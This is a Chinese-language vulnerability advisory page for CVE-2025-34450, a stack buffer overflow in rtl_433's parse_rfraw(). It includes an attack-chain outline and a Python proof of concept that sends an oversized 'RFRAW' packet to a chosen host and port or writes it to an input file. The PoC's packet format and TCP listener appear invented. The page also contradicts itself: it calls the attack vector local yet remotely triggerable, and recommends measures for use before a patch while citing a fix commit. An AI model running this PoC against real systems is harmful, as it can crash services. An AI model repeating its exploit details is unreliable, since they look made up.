CVE-2025-34450 rtl_433 parse_rfraw()栈缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-34450

漏洞类型

栈缓冲区溢出

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

rtl_433 (merbanan/rtl_433)

漏洞概述

CVE-2025-34450是merbanan/rtl_433项目中的一个高危安全漏洞，CVSS评分达到7.8分。该漏洞存在于src/rfraw.c文件中的parse_rfraw()函数，是典型的栈缓冲区溢出问题。攻击者可以通过构造恶意或过大的原始RF输入数据，使应用程序在处理时超出栈缓冲区的边界进行写入操作，从而导致内存损坏或程序崩溃。

rtl_433是一款广泛使用的开源软件，用于接收和解码各种433MHz频段的无线设备信号，如气象站、胎压监测器、远程控制设备等。该软件在树莓派和各种嵌入式系统中被大量部署，用于物联网数据采集和智能家居场景。由于其处理外部输入的特性，漏洞可被远程触发。

根据漏洞披露信息，该漏洞可被利用造成拒绝服务（DoS），在特定条件下还可能基于执行环境和现有安全缓解措施进行进一步利用。漏洞发现者为VulnCheck安全团队，于2025年12月18日正式披露。

技术细节

该漏洞的根本原因在于parse_rfraw()函数在处理原始RF数据时缺乏适当的边界检查。在src/rfraw.c的实现中，函数使用栈上分配的固定大小缓冲区来存储输入数据，但未验证输入数据的长度是否在缓冲区容量范围内。当接收到超长的RF原始数据时，memcpy或其他内存写入操作会将数据直接写入栈缓冲区边界之外的内存区域。

攻击者可以通过向rtl_433应用程序提供精心构造的RF输入数据来触发此漏洞。由于这是栈缓冲区溢出，攻击者有可能覆写栈上的返回地址、函数指针或其他关键数据结构，从而控制程序执行流程。在启用栈保护（stack canary）的系统上，程序可能会在检测到溢出时崩溃；在未启用保护的系统上，则可能实现任意代码执行。

漏洞的利用需要攻击者具备本地访问权限（AV:L），低权限用户（PR:L）即可触发，无需用户交互（UI:N）。受影响的产品为rtl_433，版本从初始版本到25.02版本均受影响，修复版本为commit 25e47f8之后的版本。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统上运行的rtl_433版本，确认版本<=25.02或commit<25e47f8

STEP 2

步骤2: 构造恶意输入

攻击者构造包含超长数据的RFRAW协议数据包，超出parse_rfraw()函数中栈缓冲区的容量

STEP 3

步骤3: 触发漏洞

通过文件输入、网络接口或其他方式将恶意数据传递给rtl_433的parse_rfraw()函数

STEP 4

步骤4: 栈溢出执行

函数在处理输入时将数据写入栈缓冲区边界外，导致栈内存损坏

STEP 5

步骤5: 攻击效果

程序崩溃（DoS）或在特定条件下通过覆写返回地址实现代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-34450 PoC - rtl_433 parse_rfraw() Stack Buffer Overflow
This PoC demonstrates sending an oversized RF raw packet that could trigger
the buffer overflow in parse_rfraw() function.

Note: This is for educational and testing purposes only.
"""

import socket
import struct
import sys

def create_malicious_rfraw_packet():
    """
    Create a malicious RFRAW packet that exceeds buffer bounds.
    The parse_rfraw() function in src/rfraw.c doesn't properly validate
    input length against the stack buffer size.
    """
    # RFRAW protocol header
    header = b'RFRAW\x00'
    
    # Create oversized payload (> typical buffer size of 256-512 bytes)
    # This will overflow the stack buffer in parse_rfraw()
    overflow_size = 2048  # Significantly larger than expected buffer
    overflow_payload = b'A' * overflow_size
    
    # Construct the malicious packet
    packet = header + overflow_payload
    
    return packet

def send_malicious_packet(target_host='127.0.0.1', target_port=5003):
    """
    Send the malicious RFRAW packet to rtl_433 server.
    Default port for rtl_433 is typically 5003 (MQTT) or uses file input.
    """
    try:
        packet = create_malicious_rfraw_packet()
        print(f"[*] Sending malicious RFRAW packet ({len(packet)} bytes)")
        print(f"[*] Overflow payload size: {len(packet) - len(b'RFRAW\x00')} bytes")
        
        # Try to connect to rtl_433 if running as server
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_host, target_port))
        sock.send(packet)
        print("[+] Malicious packet sent successfully")
        sock.close()
    except Exception as e:
        print(f"[!] Error: {e}")
        print("[*] Note: rtl_433 may also accept input via file or named pipe")

def create_malicious_input_file(filename='malicious_rfraw.txt'):
    """
    Create a file that can be fed to rtl_433 via stdin or file input.
    """
    packet = create_malicious_rfraw_packet()
    with open(filename, 'wb') as f:
        f.write(packet)
    print(f"[*] Created malicious input file: {filename}")
    print(f"[*] Usage: rtl_433 < {filename}")

if __name__ == '__main__':
    print("="*60)
    print("CVE-2025-34450 PoC - rtl_433 Stack Buffer Overflow")
    print("="*60)
    
    if len(sys.argv) > 1 and sys.argv[1] == '--file':
        create_malicious_input_file()
    else:
        target = sys.argv[1] if len(sys.argv) > 1 else '127.0.0.1'
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 5003
        send_malicious_packet(target, port)

影响范围

rtl_433 <= 25.02

rtl_433 < commit 25e47f8

merbanan/rtl_433 (所有版本至漏洞修复前)

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 限制rtl_433的处理输入源，仅接受可信数据源；2) 使用SELinux或AppArmor等强制访问控制工具限制rtl_433的权限；3) 在沙箱环境中运行rtl_433；4) 监控程序异常终止并设置自动重启机制以维持服务可用性；5) 考虑使用防火墙规则限制对rtl_433服务的访问。